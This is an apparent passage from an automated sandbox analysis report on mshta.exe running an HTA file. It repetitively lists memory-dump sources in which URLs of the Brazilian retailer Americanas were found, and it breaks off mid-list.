Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654357820.000000000C367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675688068.000000000C36E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C351000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A896000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666932319.000000000C368000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2696132409.0000000009A8F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774228317.000000000A8A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668295079.000000000C110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicos.americanas.com.br/
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749855570.000000000A9F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744785707.000000000A9F4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://servicos.americanas.com.br/garantia-estendida
Source: mshta.exe, 00000000.00000003.2651095257.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2772341116.000000000940C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670251868.000000000940C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668835006.0000000009409000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicos.americanas.com.br/instalacao-ar-condicionado-split
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667632978.000000000C0CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776261386.000000000C0CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2696132409.0000000009A8F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2708943406.0000000009A90000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicos.americanas.com.br/seguro-roubo-furto
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642997021.0000000009884000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642800669.0000000009875000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642855658.0000000009877000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642752424.0000000009874000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774936619.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642899262.0000000009878000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2729637256.0000000009885000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642609456.0000000009871000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642549569.0000000009870000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749765650.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642656080.0000000009872000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654506502.000000000AA0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774498479.000000000A9A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642710818.0000000009873000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-template-americanas-mobile
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774936619.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764767166.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749765650.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769702156.0000000006EF4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666216386.000000000C0BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776074552.000000000C0BF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666159543.000000000C0A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654506502.000000000AA0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-foot
Source: mshta.exe, 00000000.00000003.2729684267.0000000009802000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2644140830.00000000097FD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2644462525.00000000097FF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774936619.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2644429883.00000000097FE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2644493386.0000000009801000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749765650.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774534688.000000000A9A2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654506502.000000000AA0A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774498479.000000000A9A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654840614.000000000AA12000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-glob
Source: mshta.exe, 00000000.00000003.2729684267.0000000009802000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657107749.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664757219.0000000006E9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2644140830.00000000097FD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769084191.0000000006E9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2644462525.00000000097FF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766148440.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774936619.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764767166.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-head
Source: mshta.exe, 00000000.00000002.2776588517.000000000C110000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642997021.0000000009884000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642800669.0000000009875000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642855658.0000000009877000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654357820.000000000C367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642752424.0000000009874000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774936619.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.0000000009372000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769621202.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727460305.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642899262.0000000009878000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747509040.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C351000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2729637256.0000000009885000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666932319.000000000C368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-miss
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642997021.0000000009884000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642800669.0000000009875000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C231000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642855658.0000000009877000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642752424.0000000009874000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774936619.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642899262.0000000009878000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2729637256.0000000009885000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642609456.0000000009871000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642549569.0000000009870000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749765650.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642656080.0000000009872000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774534688.000000000A9A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-zion
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2643100035.0000000009813000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751370436.000000000A9EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642997021.0000000009884000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642800669.0000000009875000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2643227447.0000000009817000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657750155.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2643280436.0000000009818000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774829877.000000000A9E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642855658.0000000009877000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2643583993.0000000009823000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2643181884.0000000009815000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642752424.0000000009874000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728492044.000000000A9E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744061643.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750750982.000000000928C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2643488330.000000000981D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774936619.000000000AA13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-b2wad
Source: mshta.exe, 00000000.00000003.2729684267.0000000009802000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665485857.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776004246.000000000C0AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2644140830.00000000097FD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2644462525.00000000097FF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774936619.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664712398.000000000C095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655218340.000000000AC2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649211244.000000000AC29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676224284.000000000AC2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2644429883.00000000097FE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2644493386.0000000009801000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2749765650.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775320113.000000000AC2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-theme
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2658796254.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003382000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728237084.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642997021.0000000009884000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642800669.0000000009875000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774395490.000000000A904000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C231000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642855658.0000000009877000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654357820.000000000C367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2642752424.0000000009874000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748309575.0000000003385000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2750750982.000000000928C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774936619.000000000AA13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675688068.000000000C36E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748034689.000000000A901000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-zion-
Source: mshta.exe, 00000000.00000002.2771581555.0000000009311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2644140830.00000000097FD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2644462525.00000000097FF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2745451440.0000000009310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727380672.000000000930A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728196280.0000000009404000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2644429883.00000000097FE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2644493386.0000000009801000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727339470.0000000009305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766288586.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665118307.00000000093F1000.00000004.00000020.00020000.00000000.sdmp, 